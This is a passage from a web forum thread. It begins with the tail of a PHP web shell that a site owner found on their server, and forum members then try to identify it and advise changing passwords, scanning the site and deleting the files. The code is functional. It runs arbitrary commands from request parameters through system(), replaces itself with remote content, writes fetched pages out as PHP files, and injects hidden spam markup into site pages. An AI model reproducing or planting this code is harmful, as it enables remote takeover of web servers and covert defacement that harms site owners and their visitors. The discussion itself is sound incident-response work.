for ($j=$pid; $j<$pid+10; $j++)
{
	$fp = fopen($gname."?g=$curs", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
}

if ($j==100)
{
$fp = fopen($gname."?g=$curs&m=1", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	$fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	$map = "$path/$tname/$cname/$curs"."_lm.php";
	fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);

}

function Update()
{
if (isset($_GET["name"]))
	$sname = $_GET["name"];

$thisname = "$sname.php";
if (isset($_POST['u']))
$u = $_POST['u'];

if (isset($_GET['u']))
		$u = $_GET['u'];

	$fp = fopen($u, "r");
$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
fclose($fp);

$fthis = fopen($thisname, "w+");
fwrite($fthis, $fin);
fclose($fthis);
}

function Com()
{
if (isset($_POST['c']))
@system($_POST['c']);
if (isset($_GET['c']))
	@system($_GET['c']);
}

function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
$endtag = "</font></body></html><dd5> "; 
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
// ??????? ??????????? ???? ????
$fin = preg_replace ("/<\/body>/i", "", $fin);
$fin = preg_replace ("/<\/html>/i", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fp = fopen($mpt, "r");
$drs = '';
while (!feof($fp))
{
 $fc = fgets($fp, 1024);
 if (!$fc) 
 { 
	exit();
 }
$drs .= $fc;
}
fclose($fp);
$fin = $fin.$begtag; 
$fin = $fin.$drs;
$fin = $fin.$endtag; 
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}


function WrTest()
{
$path = trim($_GET['wr']);
$htname = $path."w.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
;
$fout = fopen("w.txt", "w+");
fwrite($fout, $fin);
fclose($fout);

}


function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
	Update();
	exit();
}



if (isset($_POST['c']) || isset($_GET['c']))
{
	Com();
	exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
	Gen();
	exit();
}

if (isset($_POST['g1']) || isset($_GET['g1']))
{
	GenNew();
	exit();
}


if (isset($_POST['g2']) || isset($_GET['g2']))
{
	Gen2();
	exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
	MRepl();
	exit();
}

if (isset($_POST['cl']) || isset($_GET['cl']))
{
	Clear();
	exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
	Clear2();
	exit();
}
	if (isset($_POST['wr']) || isset($_GET['wr']))
{
	WrTest();
	exit();
}

echo "<ok>";

}

Main();

?>

Share this post


Link to post
Share on other sites

it looks pretty malicious to me. it also looks like it will rename itself, or its directory periodically. Not sure what it does though. Possibly a attack (brute force) script?

 

The fact that is trying to open / read to your .htaccess file ($fht = fopen("$tname/.htaccess", "w+");) tells me you should get rid of it as well.

Share this post


Link to post
Share on other sites

Thanks Stern. I didn't think it was anything good, but I don't know enough PHP to understand what this is saying.

Share this post


Link to post
Share on other sites

We had a similar case before, where a script was dropped in every folder of the website, this script was sending some e-mails to some address specified in the querystring when called by the browser. Looked like it was sending the file/folder structure of the website etc.

 

We had to delete it all and change all the FTP passwords etc.

 

Basically it's good time to change ur passwords now and for any other usernames which have access to this FTP space. After you've done that, it'll be a good idea to scan the whole website for any remainder of this code.

Share this post


Link to post
Share on other sites

maybe time to increase the security on the system, as that is no good. If he has an upload script make sure you check it first.

Share this post


Link to post
Share on other sites

I'm the only one uploading. I'll check with the host tonight, but meanwhile I'm very curious what this script does. Can anyone tell?

Share this post


Link to post
Share on other sites

have you found these files somewhere: c, 1r.txt and 2r.txt check whats inside. From the looks of it it's some kind of link generator however I don't like that it is using the system() function at all.

You're only bet is to run the stuff in a sandbox and try it out, could be anything from link generator to a XSS injector to steal user info.

 

 

 

Share this post


Link to post
Share on other sites

The host was no help, and I ended up deleting the files. It's the same host I left recently because of similar issues, unfortunately not until after I'd recommended them to a couple clients. Live and Learn....

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
Sign in to follow this  

×
×
  • Create New...